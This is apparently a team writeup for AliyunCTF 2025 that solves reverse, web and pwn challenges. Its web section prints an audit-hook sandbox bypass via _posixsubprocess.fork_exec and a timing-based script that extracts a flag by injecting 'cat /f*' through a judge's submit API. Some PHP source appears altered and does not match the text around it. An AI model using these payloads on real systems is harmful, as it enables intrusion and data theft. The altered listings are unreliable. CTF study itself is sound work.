AliyunCTF 2025

UKFC 2025 AliyunCTF Writeup

Reverse

Easygame

牛魔酬宾

easy-cuda-rev

跑了一遍

感觉能出 五个 gift 慢慢看

快出了,现在只差 gift1 到 2 的东西 剩下都还原了

Final 更新了一下

#include <stdio.h>
#include <stdint.h>
/* Placeholder plaintext; only referenced from the commented-out code in main().
 * The 32 characters fill the array exactly, so there is no NUL terminator. */
unsigned char flag[32] = "11223344556677889900112233445566";
/*
 * Byte substitution table used by xor(). The first 256 entries are the AES
 * forward S-box; the two trailing bytes (0x52, 0x09) look like the start of
 * the AES inverse S-box and are never reached, because xor() indexes T with
 * a uint8_t.
 */
unsigned char T[258] = {
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, 
    0x52, 0x09
};

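/*
 * Inverse of encrypt(): undoes the TEA-style Feistel rounds on the 64-bit
 * block v[0..1] under the 128-bit key k[0..3].
 *
 * v: two 32-bit words, decrypted in place.
 * k: four 32-bit key words, read only.
 *
 * encrypt() performs 10485760/8 outer steps; each step applies eight rounds
 * whose per-round constant is taken from delta[] (delta[5] is 0x9E3779B9,
 * the TEA constant) and then lowers every delta[] entry by 239350328.
 * To invert it, start from the delta[] state of encrypt()'s last step and
 * walk the rounds backwards, raising delta[] before each step.
 */
void decrypt(uint32_t *v, uint32_t *k) {
    enum { STEP_LIMIT = 10485760, STEP_STRIDE = 8 };
    const uint32_t delta_step = 239350328u;
    const uint32_t step_count = STEP_LIMIT / STEP_STRIDE;

    uint32_t v0 = v[0], v1 = v[1];
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    uint32_t delta[] = {-239350328, 387276957, 2027808484, -626627285, 1013904242, -1640531527};

    /* The original warm-up loop subtracted delta_step step_count times.
     * uint32_t arithmetic wraps, so a single subtraction of the product gives
     * exactly the same state without 1.3M loop iterations. */
    for (int i = 0; i < 6; i++) {
        delta[i] -= delta_step * step_count;
    }

    for (int j = 0; j < STEP_LIMIT; j += STEP_STRIDE) {
        for (int i = 0; i < 6; i++) {
            delta[i] += delta_step;
        }
        for (int i = 0; i < 8; i++) {
            /* Mirror of encrypt()'s schedule: its eight rounds in reverse order.
             * delta_t is kept unsigned so no out-of-range int conversion occurs. */
            uint32_t delta_t;
            if (i >= 3) {
                delta_t = delta[i - 2];
            } else if (i == 0) {
                delta_t = delta[0];
            } else if (i == 1) {
                delta_t = delta[0] + 1640531527u;
            } else {
                delta_t = delta[0] - 1013904242u;
            }
            v1 -= ((v0 << 4) + k2) ^ (v0 + delta_t) ^ ((v0 >> 5) + k3);
            v0 -= ((v1 << 4) + k0) ^ (v1 + delta_t) ^ ((v1 >> 5) + k1);
        }
    }
    v[0] = v0; v[1] = v1;
}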

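/*
 * TEA-style Feistel encryption of the 64-bit block v[0..1] under the 128-bit
 * key k[0..3]. Reversed by decrypt().
 *
 * v: two 32-bit words, encrypted in place.
 * k: four 32-bit key words, read only.
 *
 * 10485760/8 outer steps; each step runs eight rounds whose constant is
 * taken from delta[] in the order delta[5], ..., delta[1], delta[0]-1013904242,
 * delta[0]+1640531527, delta[0], and then lowers every delta[] entry by
 * 239350328 for the next step. delta[5] is 0x9E3779B9, the TEA constant.
 *
 * The unused local `sum` of the original was dropped.
 */
void encrypt(uint32_t *v, uint32_t *k) {
    enum { STEP_LIMIT = 10485760, STEP_STRIDE = 8 };
    const uint32_t delta_step = 239350328u;

    uint32_t v0 = v[0], v1 = v[1];
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    uint32_t delta[] = {-239350328, 387276957, 2027808484, -626627285, 1013904242, -1640531527};

    for (int j = 0; j < STEP_LIMIT; j += STEP_STRIDE) {
        for (int i = 0; i < 8; i++) {
            uint32_t delta_t;
            if (i < 5) {
                delta_t = delta[5 - i];
            } else if (i == 5) {
                delta_t = delta[0] - 1013904242u;
            } else if (i == 6) {
                delta_t = delta[0] + 1640531527u;
            } else {
                delta_t = delta[0];
            }
            v0 += ((v1 << 4) + k0) ^ (v1 + delta_t) ^ ((v1 >> 5) + k1);
            v1 += ((v0 << 4) + k2) ^ (v0 + delta_t) ^ ((v0 >> 5) + k3);
        }
        /* Advance the constant schedule for the next step (wraps mod 2^32). */
        for (int i = 0; i < 6; i++) {
            delta[i] -= delta_step;
        }
    }
    v[0] = v0; v[1] = v1;
}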

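/*
 * Byte permutation applied to a decrypted block, done as two passes of
 * in-place swaps: first every even index is swapped with the index before it
 * (index 0 with the last byte), then the adjacent pairs (0,1), (2,3), ... are
 * swapped. Net effect on an even-length buffer of L bytes: even slot i ends
 * up with the byte from (i+2) mod L, odd slot i with the byte from (i-2) mod L.
 *
 * mm:     buffer, permuted in place.
 * length: number of bytes in mm. The original ignored it and hard-coded 256;
 *         for length == 256 the result is identical. Only the leading even
 *         number of bytes is permuted, so an odd trailing byte stays put
 *         instead of being paired with a byte past the end.
 */
void gift2_3_4(unsigned char *mm, int length) {
    if (length < 2) {
        return;   /* nothing to pair up; also keeps a negative length out of the unsigned math */
    }
    /* Round down to an even count so mm[i + 1] below never leaves the buffer. */
    const unsigned int n = (unsigned int)length & ~1u;

    for (unsigned int i = 0; i < n; i += 2) {
        unsigned int prev = (i == 0) ? n - 1 : i - 1;
        unsigned char tmp = mm[prev];
        mm[prev] = mm[i];
        mm[i] = tmp;
    }
    for (unsigned int i = 0; i < n; i += 2) {
        unsigned char tmp = mm[i];
        mm[i] = mm[i + 1];
        mm[i + 1] = tmp;
    }
}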

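/*
 * Packs the first 32 bytes of data into eight little-endian 32-bit words.
 *
 * data: at least 32 readable bytes.
 * v:    receives v[0..7].
 * Returns 0; there is no failure path.
 *
 * Each byte is widened to uint32_t before shifting. A plain unsigned char
 * promotes to int, and `int << 24` for a byte >= 0x80 produces a value that
 * does not fit in int, which is undefined behaviour in C.
 */
int char_to_uint32(unsigned char *data, uint32_t *v) {
    for (int i = 0; i < 8; i++) {
        const unsigned char *b = data + 4 * i;
        v[i] = (uint32_t)b[0]
             | ((uint32_t)b[1] << 8)
             | ((uint32_t)b[2] << 16)
             | ((uint32_t)b[3] << 24);
    }
    return 0;
}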

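/*
 * Per-byte substitution/XOR layer over a 256-byte block, in place.
 *
 * data: 256 bytes, transformed in place.
 * Returns 0; there is no failure path.
 *
 * For each byte: 5 * 10485760 rounds of (XOR with the low byte of the
 * descending counter, nibble swap, lookup through T[]), then one more nibble
 * swap and an XOR with (idx * 73 + 172) & 0xFF. The round count is the
 * challenge's work factor; expect this to run for a long time.
 *
 * Fix: the progress printf used %d for a size_t, which is undefined
 * behaviour; %zu is the matching conversion.
 */
int xor(unsigned char *data) {
    enum { BLOCK_LEN = 256, ROUND_REPEATS = 5, ROUNDS = 10485760 };
    const unsigned char key = 172;

    for (size_t idx = 0; idx < BLOCK_LEN; idx++) {
        printf("%zu\n", idx);   /* progress: one line per byte */
        uint8_t val = data[idx];
        for (int rep = 0; rep < ROUND_REPEATS; rep++) {
            for (int i = ROUNDS - 1; i >= 0; i--) {
                val ^= (uint8_t)(i & 0xFF);
                val = (uint8_t)((val >> 4) | (val << 4));   /* swap nibbles */
                val = T[val];
            }
        }
        val = (uint8_t)((val >> 4) | (val << 4));
        uint8_t mask = (uint8_t)((idx * 73u + key) & 0xFF);
        val ^= mask;
        data[idx] = val;
    }
    return 0;
}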

/*
 * Driver: reads flag_enc in 256-byte blocks, runs the inverse pipeline
 * (decrypt, then gift2_3_4, then xor) on each block and appends the result
 * to flag_dec.
 *
 * NOTE(review): several things here look unfinished and are left as-is:
 *  - v holds 256/4 = 64 words, but the decrypt loop passes v + 8*i for
 *    i < 32, i.e. up to v[249]; from i = 8 on that is outside v (stack
 *    buffer overflow, undefined behaviour).
 *  - char_to_uint32() fills only v[0..7] and the write-back loop copies only
 *    v[0..7] (32 bytes) into data, so decrypt() calls with i >= 1 work on
 *    uninitialised words and the remaining 224 bytes of each block never
 *    pass through the decrypt step.
 *  - cnt is printed but never incremented; fp and fp2 are never fclose()d
 *    (their buffers are flushed only because main() returns normally).
 */
int main(){

    // unsigned char data [] = {0x48,0xef,0x7b,0xb4,0x4e,0x3a
    //     ,0x24,0x5f,0xca,0xb0,0xd0,0xc4,0x0a,0xeb,0xf4,
    //     0xb1,0x70,0xb8,0x9a,0x1d,0x51,0x54,0x5b,0x88,0xa8,0x72,
    //     0xb0,0x2c,0x78,0xac,0x3b,0x6c,0xe4,0xb3,0xe6,0xe3,0xd9,
    //     0x38,0x6b,0x08,0xc4,0xfb,0x90,0x6a,0xf0,0x5e,0x8e,0x25,
    //     0x51,0x01,0x98,0x28,0x95,0x5a,0x5e,0x84,0x66,0x1d,0x26,
    //     0x65,0xdc,0xae,0x94,0xdb,0xf3,0x0a,0x02,0x21,0xc9,0x68,
    //     0x2d,0x7f,0x82,0x5c,0x99,0x94,0x34,0x3b,0xee,0xd1,0x79,
    //     0xb5,0xc3,0x68,0xb5,0x82,0x25,0xa0,0xf6,0xcf,0xbb,0xcd,
    //     0x5a,0x19,0xe8,0xb3,0x76,0x0f,0x41,0x64,0xbd,0x2e,0xfa,0xb9,0x00,0xdf,0x5a,0x3c,0xb1,0x02,0x69,0x08,0x40,0x0e,0x52,0xea,0x97,0x0b,0x16,0x51,0x55,0xdc,0x81,0xa4,0xdd,0x57,0xb0,0x15,0x10,0x4d,0xe1,0xd4,0x42,0x6c,0xd2,0x25,0xe1,0x70,0xa0,0x37,0xb6,0x2b,0xc8,0x45,0xd5,0x52,0x14,0x53,0x00,0x6f,0xa5,0xb4,0x56,0x7f,0x64,0xba,0x41,0x66,0x2b,0x94,0x7a,0xca,0x0d,0xcc,0x00,0xcf,0xa4,0x9d,0xb9,0x58,0xa4,0x07,0x24,0x8e,0x9d,0xff,0x12,0x6c,0x88,0x06,0xaf,0x24,0x2f,0x3d,0xca,0xf4,0xa6,0x49,0x93,0x0e,0xdb,0x65,0xec,0x5c,0x8d,0x43,0x97,0x07,0x6c,0x34,0xca,0xd1,0x26,0x66,0xcc,0x87,0x5b,0xb9,0x92,0x3d,0x1e,0xd8,0xa7,0x12,0xb6,0xd7,0xfa,0x44,0x8a,0x72,0xa0,0x82,0xc0,0x7f,0xa6,0x00,0xf9,0x23,0x61,0xa3,0x91,0xb7,0x7b,0x4e,0xc2,0x5f,0xae,0x9c,0xb6,0xe9,0x20,0xe8,0x6e,0x54,0x1b,0x35,0x09,0xbb,0x21,0x31,0x12,0xfd,0x8e,0xc1,0xc5,0x5f};
  
    // 128-bit TEA-style key; the negative literals wrap to the intended 32-bit values.
    unsigned int key [] ={
        -1556008596,-939442524,1013904242,338241895
    };
    // Read the input file in a loop, 256 bytes at a time
    FILE *fp = fopen("flag_enc", "rb");
    if (fp == NULL) {
        printf("open file error\n");
        return 0;
    }
    // Create the output file
    FILE *fp2 = fopen("flag_dec", "wb");
    if (fp2 == NULL) {
        printf("open file error\n");
        return 0;
    }
    unsigned char data[256];
    int cnt = 0;
    // A short final block (fread < 256) is silently dropped.
    while (fread(data, 1, 256, fp) == 256) {
        unsigned int v[256/4];
        char_to_uint32(data, v);
        // NOTE(review): stride 8 with 32 iterations overruns the 64-word v (see header).
        for (int i=0; i<256/8; i++) {
            decrypt(v + 8*i, key);
        }
        // Only the first 8 words (32 bytes) are written back.
        for (int i = 0; i < 8; i++) {
            data[i*4] = (v[i]) & 0xFF;
            data[i*4+1] = (v[i] >> 8) & 0xFF;
            data[i*4+2] = (v[i] >> 16) & 0xFF;
            data[i*4+3] = (v[i] >> 24) & 0xFF;
        }
        gift2_3_4(data, 256);
        xor(data);
        printf("%d: %x\n", cnt , data[0]);
        fwrite(data, 1, 256, fp2);
    }
    // unsigned int v[256/4];
    // char_to_uint32(data, v);

    // for (int i = 0; i < 8; i++) {
    //     printf("0x%x,", v[i]);
    // }

    // printf("\n");
    // decrypt(v, key);

    // for (int i = 0; i < 8; i++) {
    //     printf("0x%x,", v[i]);
    // }
        // calcul_sum();
    // // first gift
    // unsigned char key = 172;
    // unsigned char* data= flag;
    // unsigned int idx = 0;
    // for (idx = 0; idx < 32; idx++)
    // {
    //     unsigned char val = data[idx];
    //     uint16_t temp = (idx * 73u + key) & 0xFF;
    //     val ^= temp;
    //     val = (val >> 4) | (val << 4);
    //     for (size_t j = 0; j < 5; j++)
    //     {
    //         for(int i = 0; i < 10485760; i++) { 
    //             val = T[val];
    //             val = (val >> 4) | (val << 4);
    //             val ^= i & 0xFF;
    //         }
    //     }
    //     data[idx] = val;
    //     printf("%x ", data[idx]);
    // }

  
    // uint8_t val = data[idx];
    // uint16_t temp = (idx * 73u + key) & 0xFF;
    // val ^= temp;
    // val = (val >> 4) | (val << 4);
    // for (size_t j = 0; j < 5; j++)
    // {
    //     for(int i = 0; i < 10485760; i++) { 
    //         val = T[val];
    //         val = (val >> 4) | (val << 4);
    //         val ^= i & 0xFF;
    //     }
    // }
    // data[idx] = val;
    // printf("%x\n", data[0]);
    // first stage: encryption over the 5 big loops
}

Web

Ezoj

sys.addaudithook是[Python 3.8](https://www.baidu.com/s?rsv_dl=re_dqa_generate&sa=re_dqa_generate&wd=Python%203.8&rsv_pq=d88fa736000df0bb&oq=sys.addaudithook&rsv_t=2b23Juo3nDF8SvbcYS4p38QE1OfZmOFx1Xqr97v3uIQbLRJ+SSVyHnOnyPM&tn=baidu&ie=utf-8)版本中引入的一个功能,用于添加审计钩子(audit hook),以监控和记录Python程序在运行时的安全敏感行为。审计钩子可以用于监控如文件读写、网络通信和动态代码执行等操作。

解法 1:把文件读取到另一个文件里面,但是不知道有没有读写权限

解法 2:打内存马,但是要绕过 addaudithook

本地调试,这个是能执行的,不出网盲注吧

import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event, args):
    """Audit hook: log every event, then refuse anything outside a small allowlist.

    Raising RuntimeError aborts the operation that triggered the event. Only
    events CPython actually emits can be seen here; an operation that emits
    no audit event is never presented to this hook at all.
    """
    allowed = ("import", "time.sleep", "builtins.input", "builtins.input/result")
    print(f"审计事件: {event}, 参数: {args}")
    if event not in allowed:
        raise RuntimeError

sys.addaudithook(audit_checker)

# Probe from the writeup. The hook above is an allowlist of *event names*, so
# it can only stop calls that emit an audit event; the writeup reports that
# this ran locally, i.e. on that interpreter the call below raised no event the
# hook could reject. Audit hooks are a monitoring aid, not a sandbox: code that
# is not trusted belongs in a separate process/container with its own limits.
try:
    import os
    import _posixsubprocess
    _posixsubprocess.fork_exec([b"123", "/etc/passwd"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1,-1, *(os.pipe()), False, False, False, None, None, None, -1, None, False)
except RuntimeError as e:
    print(f"error")

还在尝试怎么把命令塞进去

命令写好了,开始写盲注脚本了

import requests
import string

# Timing-oracle check used in the writeup against the judge's /api/submit: one
# request per (position, candidate character); a "TLE" verdict or an HTTP
# timeout is read as "the character matched". From the defender's side the
# weak points are visible here: the judge only filters submissions through an
# audit hook (which misses anything that emits no audit event), and its verdict
# depends on runtime behaviour, so each request leaks one bit. Process-level
# isolation of submissions and rate limiting are the mitigations.
charset = string.ascii_letters + string.digits + "{}_-"
url = "http://121.41.238.106:26721/api/submit"
flag = ""

for i in range(1, 50):
    for char in charset:
        data = {
            "problem_id":"0","code":f"import os\nimport _posixsubprocess\n\n_posixsubprocess.fork_exec([\"abc\",\"-c\",\"import os;import time;flag=os.popen('cat /f*').read();'{char}'==flag[{i-1}] and time.sleep(5)\"], [b\"/bin/python3\"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)\na, b = map(int, input().split())\nresult = a + b\nprint(result)"
        }
  
        try:
            r = requests.post(url, json=data, timeout=6)
            # Verdict-based signal: a TLE means the sleep branch ran.
            if r.json().get("status") == "TLE":
                flag += char
                print(f"Flag: {flag}",flush=True)
                break
        except requests.exceptions.Timeout:
            # Client-side timeout is treated the same way as a TLE verdict.
            flag += char
            print(f"Timeout Found: {char} | Flag: {flag}",flush=True)
            break
  
    # Stop once the closing brace has been recovered.
    if flag.endswith("}"):
        break

print("Final Flag:", flag)

打卡 ok

路由后面加~可以看源码

index.php

<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="keywords" content="HTML5 Template">
    <meta name="description" content="Forum - Responsive HTML5 Template">
    <meta name="author" content="Forum">
    <link rel="shortcut icon" href="favicon/favicon.ico">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
<!-- tt-mobile menu -->

<main id="tt-pageContent" class="tt-offset-none">
    <div class="container">
        <div class="tt-loginpages-wrapper">
            <div class="tt-loginpages">
                <a href="index.html" class="tt-block-title">
                    <div class="tt-title">
                        登陆
                    </div>
              
                </a>
                <!-- Login form: posts username, password and code to login.php. -->
                <form class="form-default" method="post" action="./login.php">
                    <div class="form-group">
                        <label for="loginUserName">Username</label>
                        <input type="text" name="username" class="form-control" id="loginUserName" >
                    </div>
                    <div class="form-group">
                        <label for="loginUserPassword">Password</label>
                        <input type="password" name="password" class="form-control" id="loginUserPassword">
                    </div>
                    <div class="form-group">
                        <label for="code">code</label>
                        <!-- Third credential field; rendered as a password input, no id to match the label's "for". -->
                        <input type="password" name="code" class="form-control">
                    </div>
                    <div class="form-group">
                        <button  class="btn btn-secondary btn-block">Log in</button>
                    </div>
              
                </form>
            </div>
        </div>
    </div>
</main>
<script src="js/bundle.js"></script>
</body>
</html>
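<?php
$servername = "localhost";
$username = "web";
$password = "web";
$dbname = "web";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
session_start();
include './pass.php';
if (isset($_POST['username']) and isset($_POST['password'])) {
    // addslashes() is kept only so that $_SESSION['username'] and the
    // welcome message stay the same as before; it is not what protects the
    // query (it is charset-dependent and not an SQL escaping function).
    $username = addslashes($_POST['username']);
    $lookup = $_POST['username'];
    $password = $_POST['password'];
    // Was read unconditionally (notice when the field is absent); default to ''.
    $code = isset($_POST['code']) ? $_POST['code'] : '';
    // Stored format: md5(salt . password) . ':' . salt, the client sends the salt as "code".
    $endpass = md5($code . $password) . ':' . $code;

    // Prepared statement: the username is bound as data and never spliced
    // into the SQL text, so quoting tricks cannot change the query.
    $stmt = $conn->prepare("select password from users where username=?");
    $found = false;
    if ($stmt !== false) {
        $stmt->bind_param("s", $lookup);
        $stmt->execute();
        $stmt->store_result();
        $found = $stmt->num_rows > 0;
    }
    if ($found) {
        $stmt->bind_result($stored);
        while ($stmt->fetch()) {
            // Strict, constant-time comparison instead of the loose ==.
            if (hash_equals((string)$stored, $endpass)) {
                $_SESSION['login'] = 1;
                $_SESSION['username'] = md5($username);
                // json_encode() produces a proper JS string literal and escapes "/",
                // so a name containing </script> cannot end the script block.
                $welcome = json_encode("Welcome $username!");
                echo "<script>alert($welcome);window.location.href=\"./index.php\";</script>";
            }
        }
        $stmt->close();
    } else {
        echo "<script>alert(\"错误\");</script>";
        die();
    }
    $conn->close();
}
?>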

login.php,一眼注入(注不出来)

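<?php
$servername = "localhost";
$username = "web";
$password = "web";
$dbname = "web";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
session_start();
include './pass.php';
if (isset($_POST['username']) and isset($_POST['password'])) {
    // addslashes() is kept only so that $_SESSION['username'] and the
    // welcome message stay the same as before; it is not what protects the
    // query (it is charset-dependent and not an SQL escaping function).
    $username = addslashes($_POST['username']);
    $lookup = $_POST['username'];
    $password = $_POST['password'];
    // Was read unconditionally (notice when the field is absent); default to ''.
    $code = isset($_POST['code']) ? $_POST['code'] : '';
    // Stored format: md5(salt . password) . ':' . salt, the client sends the salt as "code".
    $endpass = md5($code . $password) . ':' . $code;

    // Prepared statement: the username is bound as data and never spliced
    // into the SQL text, so quoting tricks cannot change the query.
    $stmt = $conn->prepare("select password from users where username=?");
    $found = false;
    if ($stmt !== false) {
        $stmt->bind_param("s", $lookup);
        $stmt->execute();
        $stmt->store_result();
        $found = $stmt->num_rows > 0;
    }
    if ($found) {
        $stmt->bind_result($stored);
        while ($stmt->fetch()) {
            // Strict, constant-time comparison instead of the loose ==.
            if (hash_equals((string)$stored, $endpass)) {
                $_SESSION['login'] = 1;
                $_SESSION['username'] = md5($username);
                // json_encode() produces a proper JS string literal and escapes "/",
                // so a name containing </script> cannot end the script block.
                $welcome = json_encode("Welcome $username!");
                echo "<script>alert($welcome);window.location.href=\"./index.php\";</script>";
            }
        }
        $stmt->close();
    } else {
        echo "<script>alert(\"错误\");</script>";
        die();
    }
    $conn->close();
}
?>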

pass.php

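<?php
/**
 * Password helper: generates a random salt source and derives the stored
 * credential string from it.
 */
class mypass{
    /**
     * Returns a random alphanumeric string of $length characters
     * ([0-9a-zA-Z]); an empty string for $length <= 0.
     *
     * random_int() (CSPRNG) replaces rand(): the value feeds the salt of a
     * stored credential, and rand() output is predictable.
     */
    public function generateRandomString($length = 10) {
        $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $charactersLength = strlen($characters);
        $randomString = '';

        for ($i = 0; $i < $length; $i++) {
            $randomString .= $characters[random_int(0, $charactersLength - 1)];
        }

        return $randomString;
    }

    /**
     * Builds the stored form of $plain: md5(salt . $plain) . ':' . salt, where
     * salt is the first five hex characters of md5() of a fresh random string.
     * The login page recomputes the same thing from the posted "code" (salt)
     * and password.
     */
    public function checkpass($plain) {
        $password = $this->generateRandomString();
        $salt = substr(md5($password), 0, 5);
        $password = md5($salt . $plain) . ':' . $salt;
        return $password;
    }
}
?>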

/ok.php~里面有个/adminer_481.php,进去直接登,改了个前面的 guest:123456,code=123456 账号,但是这个 web 用户没写的权限

发现居然有个 root:root

Offens1ve

本地 hosts 搭起来看

2018 年的 ADFS

拓扑图也出来了,那肯定就是渗透了

ADFS 的 url 为

https://sts.offensive.local/adfs/ls/?wtrealm=https%3A%2F%2Foa.offensive.local%3A8443%2F&wctx=WsFedOwinState%3DJkJPfN6-8ErIqErWJTCZx1o728SAtTK0EwcVtdRGY-shzrIENZO8hT3WNV0Mu5llFp7tCoej9MG7B1Agdkcp69vX95gvW41g136UCjYhZj7lRwZzVZ2829evoSTDndgaT8eiphaNylhAWaygWhx6tw&wa=wsignin1.0

尝试 ssrf 打一波,在参数 wtrealm 来试试,测了下没有,尝试 saml token 伪造,依然没有说法

PWN

Runes

这个题主要是两个点

一个是传参只能是数字的任意 syscall 执行

第二个是有一块 mmap 的空间

任意 syscall 执行有限制条件,系统调用号和参数不得小于目前人物等级的 100 倍

第二个 mmap 由于映射了 fd,可以通过 fd 写数据从而执行 shellcode

要完成这些任务需要一定操作

若对整个题目有很熟悉的了解,会发现正常情况下 syscall 只能执行一次

而且升级比较难,而且单纯通过逻辑无法控制血量满足某些要求

在第二个利用部分,如果 mmap 失败,记录 boss 血量的栈位置会直接更改成满足“开挂”部分的条件的值,从而进行多次 syscall,轻松完成题目

mmap 失败只能通过 fd(应该)的操作,最简单是 close,close 掉 fd 就需要 10 级以上

由于涉及数值输入较少,并且有阻止整型溢出的检测,有可能是对杀怪以及掉落经验进行计算,说不定有能满足 close(1023) 的机会

如果满足,就可以 close,使得 mmap 失败,同时触发预留外挂,进行无限制 syscall,重复程序开始时的 syscall 操作,mmap 映射 memfd 修改,写入 shellcode 并执行

当 atk 高于怪的 hp 时,可以不掉血

交互:

# Short wrappers around the pwntools tube `io` (created elsewhere) so the
# interaction code below stays compact.
def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def r(x):
    return io.recv(x)

def ru(x):
    return io.recvuntil(x)

def rl(x):
    return io.recvline(x)

def inter():
    return io.interactive()
def cmd(idx):
    """Choose menu entry `idx` once the "3. Exit" line of the menu has been seen."""
    choice = str(idx)
    sla(b"3. Exit", choice)

def get_atk():
    """Read the player's ATK value: the two characters after '  ATK: '.

    Assumes the value is printed with exactly two characters — TODO confirm
    against the binary's output once ATK reaches three digits.
    """
    ru(b'  ATK: ')
    return int(r(2))

def get_monster_hp():
    """Read the monster's HP: the two characters after 'Monster: HP: '.

    Like get_atk(), this assumes a two-character value.
    """
    ru(b'Monster: HP: ')
    return int(r(2))
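def atk_Goblin():
    """Grind until ATK reaches 40, fighting only the 30-HP monster.

    Each iteration opens a fight (menu 1), reads the monster's HP, then either
    attacks it to death (when HP is 30) or runs (menu 4). The local `atk`
    copy is bumped by 5 whenever the game reports a higher value, mirroring
    the observed step size.

    Fixes versus the original: the hit count is computed as an integer
    ceiling (the original used float division and a duplicated
    `cnt = cnt = ...` assignment).
    """
    atk = get_atk()
    while atk < 40:
        cmd(1)
        monster_hp = get_monster_hp()
        print("cnt", monster_hp // atk)
        # hits needed = ceil(monster_hp / atk)
        cnt = (monster_hp + atk - 1) // atk
        if monster_hp == 30:
            for _ in range(cnt):
                sla("4. Run\n", str(1))
                print("monster_hp", monster_hp)
        else:
            sla("4. Run\n", str(4))

        if get_atk() > atk:
            atk += 5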
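def atk_all(cho, level):
    """Grind until ATK reaches 20 + (level - 1) * 5, engaging monsters by tier.

    cho:   which HP tiers to fight: >= 1 fights 30-HP, >= 2 also 40-HP,
           >= 3 also 50-HP monsters; anything else is fled (menu 4). Once ATK
           is at least 40 it is overwritten with 2 (as in the original, this
           also lowers a cho of 3).
    level: target level; the ATK target is derived from it.

    Fixes versus the original: integer ceiling for the hit count instead of
    float division with a duplicated assignment, and plain `and` instead of
    bitwise `&` on booleans.
    """
    atk = get_atk()
    target = 20 + (level - 1) * 5
    while atk < target:
        cmd(1)
        monster_hp = get_monster_hp()
        print("cnt", monster_hp // atk)
        # hits needed = ceil(monster_hp / atk)
        cnt = (monster_hp + atk - 1) // atk
        if atk >= 40:
            cho = 2

        # HP -> minimum cho tier required to engage that monster.
        tier = {30: 1, 40: 2, 50: 3}.get(monster_hp)
        if tier is not None and cho >= tier:
            for _ in range(cnt):
                sla("4. Run\n", str(1))
                print("monster_hp", monster_hp)
        else:
            sla("4. Run\n", str(4))

        if get_atk() > atk:
            atk += 5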

broken_compilter
